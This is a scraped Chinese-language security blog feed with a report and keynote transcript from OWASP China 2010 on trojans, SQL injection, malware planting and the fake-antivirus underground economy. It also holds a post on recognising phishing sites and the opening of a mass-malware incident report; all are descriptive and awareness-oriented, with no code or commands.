style="font-weight:bold;">OWASP 中國峰會大會會刊</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiKHosZZ6I/AAAAAAAABOQ/LlujC9DZK0Y/s1600/owasp_publication+(665x918).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 232px; height: 320px;" src="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiKHosZZ6I/AAAAAAAABOQ/LlujC9DZK0Y/s320/owasp_publication+(665x918).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532824006012004258" /></a><br /><br /><span style="font-weight:bold;">敝人在大會會刊上的講師相親照...=/=</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiMBeFySAI/AAAAAAAABOg/Qv8ty9WkJuo/s1600/owasp_benson_bio+(770x501).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 208px;" src="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiMBeFySAI/AAAAAAAABOg/Qv8ty9WkJuo/s320/owasp_benson_bio+(770x501).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532826099109742594" /></a><br /><br /><span style="font-weight:bold;">OWASP 2010 中國峰會大會議程</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMiQ1YUs9YI/AAAAAAAABQY/kI3fuE6BMDE/s1600/owasp_agenda+(780x825).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 302px; height: 320px;" src="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMiQ1YUs9YI/AAAAAAAABQY/kI3fuE6BMDE/s320/owasp_agenda+(780x825).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532831388961404290" /></a><br /><br /><span class="fullpost">大會開場是<a href="http://deke.ruc.edu.cn/ReadNews.asp?NewsID=206">中國人民大學的石文昌教授</a>,以及OWASP中國分會主席萬振華(Rip)致詞,他們特別感謝本屆 OWASP 2010 中國峰會能獲得多方領導、朋友的大力支持,尤其能邀請到公安部網絡安全保衛局的郭啟全處長等嘉賓發表演說,還得到銀監會、國家電網、民航、中鐵、高校等部門和單位的領導和專家的大力支持。同時也對本屆峰會大力支持的合作夥伴表示由衷的感謝,分別是:安恆信息、阿碼科技、啟明星辰、梭子魚網路、深圳昂凱、神州數碼、古安科技、南京瀚海源等。<br /><br />接著是 OWASP 全球董事會 Tom Brennan致詞,並由 Helen 現場翻譯。他強調大家彼此互相尊重,互相合作,並喚醒所有的軟體開發者建立堅固的代碼。<br /><span style="font-weight:bold;"><br />Tom Brennan在致詞</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMiMgbjIM6I/AAAAAAAABOo/nIaMZwzdEo8/s1600/dsc_0011101+(600x450).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMiMgbjIM6I/AAAAAAAABOo/nIaMZwzdEo8/s320/dsc_0011101+(600x450).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532826631003452322" /></a><br /><br />China 2010 中國峰會的第一位演講嘉賓是公安部的郭啟全處長。他主要分享中國在1)等級保護制度(<a href="http://www.djbh.net">http://www.djbh.net</a>)推展的情況與成效,2)當前網絡安全形勢與防禦對策,3)等級保護體系的配套措施,以及4)下一步未來三年的等保工作內容。可以看到中國在資訊安全的最終目標是讓國家的重要系統具備「有效抵禦」的能力,那就是最大抵擋,最小折損。<br /><br /><span style="font-weight:bold;">公安部郭啟全處長<br /></span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_yf4OE0MUhMQ/TMiNGwYV2qI/AAAAAAAABOw/XJiyEBZIOps/s1600/dsc_0020+(600x450).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://3.bp.blogspot.com/_yf4OE0MUhMQ/TMiNGwYV2qI/AAAAAAAABOw/XJiyEBZIOps/s320/dsc_0020+(600x450).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532827289430383266" /></a><br /><br />緊接著演講的嘉賓是中國科學院軟件研究所(ISCAS)負責系統安全與可信計算的丁麗萍研究員,她過去有警察的資歷,有刑事科學與犯罪偵查實務經驗,此次演講的主題是新型網路環境下的電腦取證技術研究。她對電腦取證在中國的法源、技術發展、以及近年國家型計畫的研究題目做了扼要分享。丁研究員最後亦對熱門的雲計算、物聯網(the internet of things)、三網融合(電信、廣播、網際網路)分享她所看到的電腦取證困難與機會。以雲計算為例,其中問題包刮高效計算和高效存儲帶來的安全威脅。以物聯網為例,最大的問題在於虛擬資安議題擴及至實體安全議題,各物質均因具備 RFID 等晶片而間接面對網際網路上的安全威脅;以三網融合為例,主要問題在於龐大的資訊量與因圖像等多媒體帶來的內容安全複雜度。<br /><br /><span style="font-weight:bold;">丁麗萍研究員<br /></span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiOgjFkbDI/AAAAAAAABPg/WD6TEN_477E/s1600/speaker_ding+(1024x576).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 180px;" src="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiOgjFkbDI/AAAAAAAABPg/WD6TEN_477E/s320/speaker_ding+(1024x576).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532828832050211890" /></a><br /><br />第三位嘉賓是中國網際網路資訊中心(CNNIC)的邢志傑安全專家,就網際網路域名安全挑戰與對策進行分享,他妙喻DNS就是打蛇打七寸的七寸,他也向大家介紹了 DNSSEC,並概述 CNNIC 的近況。<br /><br /><span style="font-weight:bold;">邢志傑安全專家</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiNo3zbvGI/AAAAAAAABPI/fAbMeb2FJQY/s1600/dsc_0007+(600x450).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiNo3zbvGI/AAAAAAAABPI/fAbMeb2FJQY/s320/dsc_0007+(600x450).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532827875538615394" /></a><br /><br /><br />接著是安杭資訊的CEO范淵(Frank)分享他從一個普通Java工程師轉型至今天投入資訊安全產品研發之路,Frank 所分享的「縱觀中國 WEB 安全 5 年發展歷程及趨勢與挑戰」精闢地歸納中國在過去幾年所經歷的資訊安全課題與達成的里程碑成就,包括在實體或虛擬世界均呈現高水準、可信賴的 2008 北京奧運。<br /><br /><span style="font-weight:bold;">安杭資訊 CEO Frank</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiN3jKVwVI/AAAAAAAABPQ/T_wEEqp1eYg/s1600/speaker_frank+(1024x576).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 180px;" src="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiN3jKVwVI/AAAAAAAABPQ/T_wEEqp1eYg/s320/speaker_frank+(1024x576).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532828127695585618" /></a><br /><br />接下來就是阿碼科技的演講了! 主持人友善的介紹Benson將帶來「萬馬奔騰、裝模作樣 (Trojan: Trusted Insider)」的精彩演講。在演講一開始,我先感謝公司的同事費爾德(Fyodor)與老闆黃耀文(Wayne)對這份簡報提供的寶貴意見,讓我能夠大大提升這次演說的品質。<br /><br /><span style="font-weight:bold;">阿碼科技 Benson</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiOFZ-Z62I/AAAAAAAABPY/XKtEm4Sb6kI/s1600/dsc_0001+(600x450).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiOFZ-Z62I/AAAAAAAABPY/XKtEm4Sb6kI/s320/dsc_0001+(600x450).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532828365747776354" /></a><br /><br />-----我重新潤飾整理演講全文如下,歡迎繼續閱讀,交流想法與相互切磋-----<br /><br />「萬馬奔騰、裝模作樣 (Trojan: Trusted Insider)」 by 阿碼科技 Dr. Benson Wu<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_yf4OE0MUhMQ/TMiOwwEZtdI/AAAAAAAABPo/oqyI3qgwKYo/s1600/benson_keynote1_title+(1024x769).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://3.bp.blogspot.com/_yf4OE0MUhMQ/TMiOwwEZtdI/AAAAAAAABPo/oqyI3qgwKYo/s320/benson_keynote1_title+(1024x769).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532829110412883410" /></a><br /><br /><span style="font-weight:bold;">引言與大綱</span><br />大家好!我是吳明蔚,今天很高興能夠來到北京參加OWASP會議。今天的主題是跟木馬有關,駭客最喜歡的就是木馬,木馬這個故事大家都知道,它是一個看起來不怎麼樣的東西,你以為它是禮物,把它默默的推到城裡面,後來它作怪。其實不像我們現在的木馬,現在的木馬是張牙舞爪,行為是很明顯的,防毒軟體一看到它就會發現它是病毒。<br /><br />我介紹一下我自己,我在臺灣出生,在菲律賓長大,我老婆是長沙人,我自己認為我們現在這個時代非常幸福,因為以前沒有網際網路的時候自己頂多能夠幫助一個人,學醫再怎麼樣厲害頂多一次救一個人,但是網際網路可以幫助很多人。所以我很喜歡李開復和大家分享的一句話,就是「做最好的自己」。你可以學很多觀念,但是你自己要有你自己的價值觀,做最好的自己。<br /><br />引用一下美國SANS的CEO的一句話,「走這行,快學中文」,外國人開始知道在中文的世界有很多資訊安全寶藏可以學習,我們的技術文章不僅先進,也有很多人樂於分享視頻教學,節省其他人學習的時間。相對的,做為中國人,那應該學什麼?我覺得應該學俄文,在俄文世界裡有很多無論是攻擊的武器還是各類地下經濟都可以做很多切磋。以下是今天的演講的大綱:首先從一些案例來分享什麼是木馬?木馬為何要裝模作樣?再談一談掛馬的一種常見方式: SQL盲注入。最後是歸納木馬產業鏈的樣態,也就是對地下經濟而言: 管他什麼馬,賺大錢最重要。<br /><br /><span style="font-weight:bold;">什麼是木馬?</span><br />它是一種惡意軟體,在資訊網路大量出沒。木馬可以做什麼呢?它可以做一些遠端的控制,像是有的人在單戀,拿木馬用在不當用途做強制視頻。它可以充當跳板,譬如發現一個網站有漏洞,但是我想打它的話會被他看到我的IP,所以我就要找一個受害者當跳板。或者是說我要寄大量的垃圾郵件,我就拿別人的郵件伺服器去搞,讓他背黑鍋。其實我覺得安全有趣的地方是在於 它是在玩弄「數位落差」和「資安意識的落差」。因為在實體安全上我們知道怎麼樣小心強盜,怎麼樣小心小偷,我們知道怎麼樣避免,看起來鬼鬼祟祟的就會去小心。但是在網路上很多人不知道要如何去小心木馬,因為網路上面有很多電腦的知識是大家無法理解的。也許我們理解了,但是爸爸媽媽們不理解,爺爺奶奶們更不理解,所以上面有很多安全的東西很有趣。<br /><br />我這邊舉個很有趣的例子,講一下假的防毒軟體,防毒軟體是一個很大的產業,非常賺錢。但誰會想到賣假的防毒軟件竟然也是一個很賺錢的生意。假的防毒軟件之所以能夠成功,就是玩弄敵我雙方的「資安意識與知識」。再來我們看,有時候你會收到很多郵件跟你講學校的郵件伺服器壞掉了,需要維護,要讓你填下你的資訊來確認,有的人一眼就看出是騙人的玩意,但也許它發1萬封,最終有幾個人上當了,它就是抓這類的機率。再來我們看最近流行的Unicode混淆副檔名的社交工程手法。這類東西是Windows本身就有的功能, 它讓使用者能指定顯示文字的方式可以從右到左或從左到右,它顯示的方向不一樣。這樣的東西是五年前就有,但最近拿來用還是非常有效,又是一個挑戰你的「資安意識與知識」的例子。正牌的防毒軟體大概有好幾十種,像是VirusTotal上面有整合的大概四十來種,但假的防毒軟體居然有超過250種品牌! 假的防毒軟體還有網上客服系統呢! 你買了這個假的防毒軟體還可以跟它的客服互動。其實平常在網路上逛大家都有機會遇到木馬,古人說人善被人欺,現在是人善被馬騎!<br /><br /><span style="font-weight:bold;">U+202E Unicode攻擊手法</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiPq9fUTnI/AAAAAAAABP4/NcwiRl5TBZM/s1600/benson_keynote_unicode_file_extension+(1024x771).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiPq9fUTnI/AAAAAAAABP4/NcwiRl5TBZM/s320/benson_keynote_unicode_file_extension+(1024x771).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532830110447849074" /></a><br /><br /><span style="font-weight:bold;">掛馬技巧:盲注入為例</span><br />分享一下怎麼樣做盲注入,這是網路上的一些入侵畫面,拿出一些國產很厲害的工具直接可以打到後面的資料庫。下一步是把馬放上去,解碼之後的注入碼是像這樣子的,基本上它只要一行注入碼,就可將所有資料庫欄位塞滿他注入的木馬連結,所以不是一個網站只有塞一隻馬,是每一個頁面每一個欄位都塞,讓你清的時候清到瘋掉。我們看這個受害案例,這邊有被塞一匹馬,那裡也有一匹木馬,它真的是一個頁面重複出現好多次相同的木馬。最有趣的地方是旁邊也有一個,但是不一樣的一匹木馬,所以是前赴後繼,各路好手都來塞各種木馬,只要漏洞沒被修補,就不會只是一次傷害、二度傷害,而是每個攻擊方經過都會持續加害。<br /><br /><span style="font-weight:bold;">木馬從張牙舞爪到裝模作樣</span><br />木馬長什麼樣我們可以看一下幾個實務案例,目前這個產業流行的木馬基本上都非常的隱蔽,有的是你明明知道這個是木馬,但是就是砍不下去,包括它DLL或Code注入至重要系統程序裡面,或以系統服務或驅動程式之姿出現。剛剛我們看到的這些都是木馬目前的現狀,目前的現狀是亂槍打鳥(或亂槍打肉雞),抓到的量就夠它這個產業。但一旦後來發現這樣已經不能活了,譬如它每次只要一出現,防毒軟體的阻擋率是百分之百,那麼它一定要開始走裝模做樣的路線,這就是未來大家更需要擔心的。因為最危險的就是披著羊皮的木馬,滿口任意道德的木馬,它們說自己是免費軟體,他們不隱藏程序,他們不利用零時差漏洞,但偷偷摸摸作怪,讓你毫不知情。這可以延伸到很多地方,其實你會擔心的東西不會只有網路,我更擔心的是延伸至各種關鍵基礎建設的系統,譬如醫療這類的東西,如果你看病的時候醫生開了藥給你,但是醫生開的藥跟你最後拿到的藥不一樣,這不是很好笑,是很可怕,最後都可能死掉。<br /><br /><span style="font-weight:bold;">膽戰心驚的諜報情節,木馬又何嘗不可如此揣摩?</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMiO8bLYjRI/AAAAAAAABPw/LjDdWjVSLO8/s1600/benson_keynote2_fake+(1024x771).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMiO8bLYjRI/AAAAAAAABPw/LjDdWjVSLO8/s320/benson_keynote2_fake+(1024x771).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532829310963453202" /></a><br /><span style="font-weight:bold;"><br />木馬創造的地下經濟</span><br />為什麼駭客會把時間花在刀口上?因為它可以賺大錢,以前大家都知道的80/20原則,現在更有90/10的賺錢之道,就是10%的人掌握大部分的財富。其實木馬可以用在洗錢,可以用在製造偽卡,可以產生物美價廉的虛擬商品市場大餅。洗錢會不會被抓,當然會,我們看這邊的交易紀錄,還是查得出來是匯到誰的人頭戶頭。但為什麼這樣的罪犯在集團中稱為是Mule(螺子)?因為他們是最下階層的,螺子是馬和驢子的下一代,沒有翻身和繁殖下一代的機會,所以FBI抓到的是洗錢集團中最沒有價值的一群罪犯。真的要抓的話應該抓上面大的,中國固然處處是黃金,但我們看到很多重大犯罪案件,那些作惡多端、無惡不作的都沒能包得住火,躲不掉國家的嚴峻制裁。偽卡這個畫面大家看一下,就是它讓購買信用卡變得像買一般民生用品一樣簡單,這些都是它們偷來的假的信用卡,但我們可以看到都是基於真實的信用卡的數據。也有很多假的虛擬商品,也就是贓貨,明明一個商品的價格要100塊,但是它只賣你10塊,而且它是有效的。也可以買DDoS阻斷式攻擊服務,也就是說我自己沒有機器我就去買一個DDoS的服務打人家。現在不僅防守方可以有資安的SaaS防禦服務,攻擊方也可以拿殭屍網路做SaaS攻擊服務!<br /><br /><span style="font-weight:bold;">搞木馬不是為了好玩,黑客是為了賺大錢</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiQWecGVvI/AAAAAAAABQI/BSM-BYgxf-0/s1600/benson_keynote3_business+(1024x772).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="http://2.bp.blogspot.com/_yf4OE0MUhMQ/TMiQWecGVvI/AAAAAAAABQI/BSM-BYgxf-0/s320/benson_keynote3_business+(1024x772).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532830858027095794" /></a><br /><br /><span style="font-weight:bold;">網路購物的品項包括信用卡...</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiP-26Xv2I/AAAAAAAABQA/h0S478X3azs/s1600/benson_keynote_fake_cc+(1024x769).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://1.bp.blogspot.com/_yf4OE0MUhMQ/TMiP-26Xv2I/AAAAAAAABQA/h0S478X3azs/s320/benson_keynote_fake_cc+(1024x769).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532830452279656290" /></a><br /><br />我們以 TDS (流量分散系統)來說明各方在這樣產業所扮演的角色。譬如說S先生今天很會掛馬,可以一下子掛一萬多網站,這個JS可以把所有看到這個網站的人都通通指向一個網站,瞬間創造1萬個人到那個網站,所以S先生就是流量產生者,S先生會賣流量,所以掛馬的人可以賣流量,它是賣家(Seller)。那誰會是買家(Buyer)呢?買家就是需要人家變成僵屍網路一員的人,比如B先生希望人家中他的木馬,“你能不能夠幫我創造每小時100個人來瀏覽我的網站?”這樣每小時就會出現有100個僵屍。我們再回顧一下剛剛那個防毒軟體,各位看一下它的銷售體制,這邊是激勵制度。這個圖是有多少個人看到這個頁面(Unique visitors),有多少個人安裝(installed),有多少人買(sold)。各位看一下他的收入多少,他一個人一個禮拜賺2 萬多塊美金! 以這個集團為例,目前有約500名銷售代表,而在這個激勵制度刺激下,我們看到第一名的銷售人員可達月收入332,000美金,還有車子等大獎等著大家去衝假的防毒軟體的業績!<br /><br /><span style="font-weight:bold;">總結: 當木馬真的成為木馬</span><br />最後我總結一下木馬的明天,隨著各種作業系統、應用軟體的加固與安全設計,譬如更穩定的IE8/9瀏覽器,Windows 7中更良好安全架構的DEP + ASLR + SEHOP + Low Integrity等等,這些對於防範張牙舞爪的木馬都會很有效果,可是零時差漏洞這種東西是可遇不可求的,有時候是要花幾萬塊錢,甚至十幾萬上百萬人民幣來買,可是有那個必要嗎?再良好的安全設計都無法阻止你點兩下把一個不可信的軟體安裝起來。不過現在木馬的猖獗已經讓全民心驚膽跳,如果你要不認識的人去看你的空間,他們可能都不敢去你的空間,因為怕你的空間有木馬。其實真正的木馬是它在你身邊你都不知道,這才是真正的木馬,而不是像現在這樣木馬是很明顯的,謝謝大家!<br /><br /><span style="font-weight:bold;">木馬的明天...無可限量</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMrxeZieB9I/AAAAAAAABRA/qLeW0luZxEs/s1600/benson_keynote4_tomorrow+(1024x770).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMrxeZieB9I/AAAAAAAABRA/qLeW0luZxEs/s320/benson_keynote4_tomorrow+(1024x770).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5533500596731906002" /></a><br /><br />後記: <br /><span style="font-weight:bold;"><a href="http://www.idcquan.com/">中國 IDC 圈</a>在大會現場打的這個立體投影我覺得挺好看的!! 效果真好~<br /></span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMiRB5iOfiI/AAAAAAAABQg/xKMn5ARRlBg/s1600/owasp_ad3+(1024x576).jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 180px;" src="http://4.bp.blogspot.com/_yf4OE0MUhMQ/TMiRB5iOfiI/AAAAAAAABQg/xKMn5ARRlBg/s320/owasp_ad3+(1024x576).jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5532831604034928162" /></a><br /><br />作者 吳明蔚(Benson Wu) 博士 為阿碼科技產品線總監<br /><br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-4429939119598259975?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=LUleuDgRIfQ:l5iP03C7mHQ:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=LUleuDgRIfQ:l5iP03C7mHQ:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=LUleuDgRIfQ:l5iP03C7mHQ:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=LUleuDgRIfQ:l5iP03C7mHQ:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/LUleuDgRIfQ" height="1" width="1"/>Benson Wunoreply@blogger.com1http://armorize-cht.blogspot.com/2010/10/owasp-2010.htmltag:blogger.com,1999:blog-1441759431140700676.post-42621833794055832702010-09-20T09:32:00.005+08:002010-09-20T22:57:41.972+08:002010-09-20T22:57:41.972+08:00模擬實戰釣魚網站(Challenge to Phishing-II) Part-II<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_eP3AH7wzygQ/TIsGy_mWCaI/AAAAAAAAAeI/1JDQ8nQxzIk/s1600/pnp.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 249px;" src="http://3.bp.blogspot.com/_eP3AH7wzygQ/TIsGy_mWCaI/AAAAAAAAAeI/1JDQ8nQxzIk/s400/pnp.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5515509641780791714" /></a><br /><截圖自 www.phish-no-phish.com 網站><br />有個網站:<br /><a href="https://www.phish-no-phish.com/">https://www.phish-no-phish.com/</a><br />上面有五題考題(同樣題目五題,但有兩種不同問法,所以是十題),測驗你對釣魚網站的識別能力。我覺得挺好的。<br />身為網路的一份子,你一定得要試試。還有中文的...cool<br /><a href="https://www.phish-no-phish.com/tw/default.aspx">https://www.phish-no-phish.com/tw/default.aspx</a><br /><br />這是 <a href="http://www.verisign.com/">VeriSign</a> 提供的一個測試網站。<br />我把心得寫在後面,建議大家測試完畢再看心得分析。<br />您有心得,也可以留下意見喔!<br /><span class="fullpost"><br />一、威脅、利誘,甚至是恐嚇的字眼。<br />這類字眼確實很常出現,因為,效果真的很好,也很常出現在詐騙的電子郵件中,可以参考<a href="http://armorize-cht.blogspot.com/2008/08/awareness-of-e-mail.html">這篇</a>。在大部分騙取帳密的手法中,這是很常出現的字眼,目的當然是要你乖乖把帳密交出來。<br /><br />二、網址列(URL)中搞把戲。<br /><a href="http://mylinkweb.blogspot.com/2008/04/url.html">這裡</a>還有一些手法,不過,當瀏覽器吃進這些怪 URL 後,應該都會解碼回來,超連結是比較常利用這手法的。另外一種花樣就是利用相似字元,如 1-l, 0-O, V-U, ...等,還有很多字元,甚至不同字型間也會有意想不到的效果,你有警覺嗎?想想,你連線的網站,確切是你要連往的嗎?<br />我想,URL 搞怪方事還很多,如何識別,我想窮舉不完。但是,你只要知道一種就好,啥是正常的...XD,學校沒講、老師沒教。下面這些 wiki 你一定得看:<br /><a href="http://zh.wikipedia.org/zh-tw/URL">http://zh.wikipedia.org/zh-tw/URL</a><br /><a href="http://zh.wikipedia.org/zh-tw/域名">http://zh.wikipedia.org/zh-tw/域名</a><br />同鞋,網路上都有,不能怪老師、學校啦。<br /><br />三、這題很難,語意不順、文字不對。<br />這真得是挑錯字。只能說正式官網應該會經多重查核,才會進行上線,因此,"比較"不會出錯。但是,詐騙網站經常會出現語意不順或用詞錯誤,甚至是語系的問題。<br /><br />四、網站加密圖示。<br />這題應該比較簡單,因為,"宣傳"夠多。你必須能正確識別「你的網頁瀏覽是否正處於加密的狀態」。每個瀏覽器還都會有些不同,甚至不同版本間還有些小差異。你務必花點時間了解。畢竟,該加密時,網站與瀏覽器之間就該處於加密的狀態。<br />另外一個進階問題:你會正確識別正確的加密簽章嗎?如果釣魚網站隨便用個簽章做加密呢?課後題。<br /><br />五、這題也很難,關建在 URL 中,即便知道哪有問題,但又該如何判斷。<br />首先,多一個「-」符號,在數位世界它就是不一樣,且是完全不一樣。判斷得靠直覺,那個判斷點很重要。留給你仔細思考。<br />「提示:如果你是銀行單位你會申請哪一個網域」<br /><br />最後,釣魚網站可以做到與真實網站一模一樣嗎?這通常還需要搭配其它攻擊手法,如 網址嫁接(<a href="http://en.wikipedia.org/wiki/Pharming">Pharming</a>),正因這類手法配合條件不易,這也是為何釣魚網站必須一直在 URL 處動手腳的原因。<br />網址嫁接攻擊有很多種手法,如<a href="http://zh.wikipedia.org/zh-tw/域名服務器緩存污染">DNS快取汙染(DNS cache poisoning)</a>手法是一種。另外本機的 Hosts 檔案竄改也是其一手法。當然,還有其他的...XD。<br /><br />本文亦張貼於「<a href="http://mysecure.blogspot.com/2010/09/challenge-to-phishing-ii.html">資安之我見</a>」。<br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-4262183379405583270?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=Jsbem6vdKL8:uakf1G4fuVA:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=Jsbem6vdKL8:uakf1G4fuVA:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=Jsbem6vdKL8:uakf1G4fuVA:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=Jsbem6vdKL8:uakf1G4fuVA:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/Jsbem6vdKL8" height="1" width="1"/>Crane_Kuhttp://www.blogger.com/profile/00147754162769411489crane_ku@hotmail.com0http://armorize-cht.blogspot.com/2010/09/challenge-to-phishing-ii.htmltag:blogger.com,1999:blog-1441759431140700676.post-47295764582373527422010-08-16T19:54:00.087+08:002010-08-31T10:37:19.709+08:002010-08-31T10:37:19.709+08:00新型態大規模掛馬--五十萬至五百萬寄放網域遭受感染(作者: Chris Hsiao, Wayne Huang, Fyodor Yarochkin, Cola Lin, Jeremy (Birdman) Chiu)<br /><a href="#part1">第一部--事件起因</a><br /><a href="#part2">第二部--Widget被掛馬,五千多網站遭殃</a><br /><a href="#part3">第三部--大規模寄放網域掛馬,影響五十萬至五百萬網域</a><br /><a href="#part4">第四部--威脅影響範圍</a><br /><a href="#part5">第五部--威脅討論</a><br /><a href="#part6">第六部--掛馬 exploit 與惡意程式分析</a><br /><a href="#part7">附錄--相關報導</a><br /><br />這次整個寄放網域遭大規模掛馬事件,雖然我們英文部落格先貼,但是一面研究一面貼,落落長貼了三篇,整理得並不好。現在我們在這邊重新整理一次,也為整個事件做個詳細的紀錄。<br /><br /><b><a name="part1">第一部--事件起因</a></b><br /><br />今年初看到了駭客透過入侵多家網站代管供應商,來進行大規模惡意掛馬的事件,此事件導致數千個網站受害而淪為惡意程式供應站。而我們在想最後這一切都會被清理,而每個網站的運作也都會回到正常--但是事情似乎不是如此....<br /><center><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 